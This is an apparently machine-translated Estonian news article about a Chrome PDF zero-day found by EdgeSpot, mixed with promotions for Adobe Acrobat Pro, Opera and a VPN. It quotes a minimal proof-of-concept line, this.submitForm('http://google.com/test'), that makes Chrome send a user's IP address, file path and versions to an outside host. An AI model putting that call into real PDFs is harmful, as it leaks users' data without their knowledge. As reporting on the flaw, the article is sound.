- EdgeSpot avastas intrigeeriva nullipäeva haavatavuse, kasutades Chrome'is PDF-dokumente.
- See haavatavus võib teie arvutisse kuuluvate tundlike andmete kogumise kaudu teile kahju teha.
- Avastage meie Veebi ja pilve leht muude tööriistade ja teenuste kohta lisateabe saamiseks.
- Kui olete brauseritest huvitatud, pakume nende kohta palju teavet Brauserite keskus.
Muutke Adobe Acrobat Readeri abil kõik oma dokumendid ligipääsetavaks ja turvaliseks. See dokumendihalduse tööriist võimaldab teil e-allkirjastada ja luua ametlikke vorme, et säästa oma aega tööl. Hankige see oma arvutisse ja saate:
- Avage, printige ja muutke kõiki oma PDF-faile ja muid failitüüpe
- PDF-vormide täitmine on lihtsam
- Hoidke olulised dokumendid krüptitud
Hankige kõik rakendused erihinnaga!
Maailma dokumendihaldustarkvara nr 1 on nüüd hea hinnaga, nii et kiirustage!
Kasutamise tuvastamise teenus EdgeSpot avastas intrigeeriva Chrome null-päevane haavatavus, kasutades PDF-dokumente.
Haavatavus võimaldab ründajatel seda teha tundlike andmete kogumiseks kasutades Chrome'is avatud pahatahtlikke PDF-dokumente.
Niipea kui ohver Google Chrome'is vastavad PDF-failid avab, hakkab pahatahtlik programm kasutajaandmete kogumise abil taustal töötama.
Seejärel edastatakse andmed kaugserverisse, mida häkkerid kontrollivad. Võib tekkida küsimus, milliseid andmeid ründajad imevad, nad sihivad teie arvutis järgmisi andmeid:
- IP-aadress
- Süsteemi PDF-faili täielik tee
- OS ja Chrome'i versioonid
Hoiduge pahavaraga kaetud PDF-failidest
Eksperdid märgatud et üks kahest domeenist readnotify [.] com või burpcollaborator [.] net oli andmeid saamas.
Nad näitasid, et ründajad kasutavad this.submitForm () PDF Javascripti API kasutajate tundliku teabe kogumiseks.
Testisime seda minimaalse PoC-ga, lihtsa API-kutsega this.submitForm (’ http://google.com/test’) paneb Google Chrome isiklikud andmed saatma google.com.
Seda Chrome'i viga kasutasid ära kaks erinevat pahatahtlike PDF-failide komplekti, mis mõlemad levitasid vastavalt 2017. aasta oktoobris ja 2018. aasta septembris.
Nimelt saavad ründajad kogutud andmeid tulevikus rünnakute täpsustamiseks kasutada. Aruanded näitavad, et esimene failipartii koostati ReadNotify'i PDF-jälgimisteenuse abil.
Kasutajad saavad teenust kasutada kasutajavaadete jälgimiseks. EdgeSpot ei ole jaganud ühtegi üksikasju teise PDF-failide komplekti olemuse kohta.
Kiire näpunäide: muutke oma brauser Operaks
Nendel rahututel aegadel rünnatakse meid igal sammul pahavara, õngevõtmise ja Trooja hobustega, nii et peame olema palju valvsamad ja hoidma end kaitstud.
Ja kuna see on Chrome'i spetsiifiline probleem, saate sellist ohtu ja kõiki teisi ohutusest turvakeskse brauseri abil vältida Ooper.
Sellel brauseril on sisseehitatud reklaamiblokeerija, mis mitte ainult ei eemalda selliseid segajaid, vaid ka blokeerib analüüsi skriptid, jälgimispikslid ja meetodid teie andmete kogumiseks.
Ja kui soovite olla täiesti kindel, et hoiate eemale igasugustest ohtudest, minge sisseehitatud sisse VPN teenus, mida saab 100% tasuta kasutada piiramatult.
Ooper
Opera pakub sisseehitatud reklaamiblokeerija ja VPN-teenuse abil täiuslikku ohukaitset!
Külastage veebisaiti
Kuidas kaitsta PDF-i haavatavusi?
Laadige alla Adobe Acrobat PRO
Adobe ja Chrome sobivad PDF-failide käitlemisel hästi kokku. Chrome'i Adobe Extensioni installimisega saate PDF-faile oma lemmikule vaadata ja neid oma lemmikbrauserist lahkumata töödelda.
Vaatamata oma tugevale struktuurile ei pruugi PDF-failidesse peidetud pahavara tuvastada, kui kasutate Readeri standardset versiooni.
Professionaalne versioon on soovitatav, et tagada teie kaitse ja hoida teie andmeid häkkerite eest.
Kuigi see pole tasuta, on teie makstav hind paljude lisavõimaluste, sealhulgas teie PDF-failide suurema turvalisuse eest üsna väike.
Komplektis on ka 7-päevane tasuta prooviversioon, et saaksite enne ostu sooritamist proovida Pro täielikku kasutuskogemust.
Adobe Acrobat PRO
Pange pahavara eemale, laadides alla Adobe Acrobat PRO. Sellel on palju rohkem funktsioone kui tasuta versioonil ja see hoiab teie andmeid turvalisena.
Külastage veebisaiti
Juhul, kui soovite Internetis surfamise ajal turvaline olla, peate oma võrgu turvamiseks hankima täielikult pühendatud tööriista. Installige privaatne Interneti-ühendus kohe ja kindlustage ennast. See kaitseb teie arvutit sirvimise ajal rünnakute eest, varjab teie IP-aadressi ja blokeerib kogu soovimatu juurdepääsu.
Exploitide tuvastamise teenus EdgeSpot soovis teavitada Chrome'i kasutajaid võimalikest riskidest, kuna plaastri lähitulevikus eeldatavasti vabastamist ei eeldatud.
EdgeSpot teatas Google'ile haavatavusest eelmisel aastal ja ettevõte lubas plaastri välja anda aprilli lõpus.
Kuid võite kaaluda probleemi ajutise lahendamise kasutamist, vaadates saabunud PDF-dokumente lokaalselt mõne muu lugejarakenduse abil.
Teise võimalusena saate oma PDF-dokumendid avada ka Chrome'is, ühendades oma süsteemid Internetist lahti.
Korduma kippuvad küsimused
Jah, saab küll. Aga kui soovite laiemat valikut, uurige meie populaarseimaid valikuid Chromeprivaatsus laiendused aastal see täielik juhend.
Tsiin on palju laiendusi, mis lubavad PDF-id töötlemine. Kontrollima välja meie suurepärane juhend Chrome'i parimate PDF-laienduste kohta.
See pole nii, kuid saate selle kiiresti aktiveerida. Siin on meie põhjalik juhend selle kohta, kuidas lubada QR-koodi generaator Chrome'is.
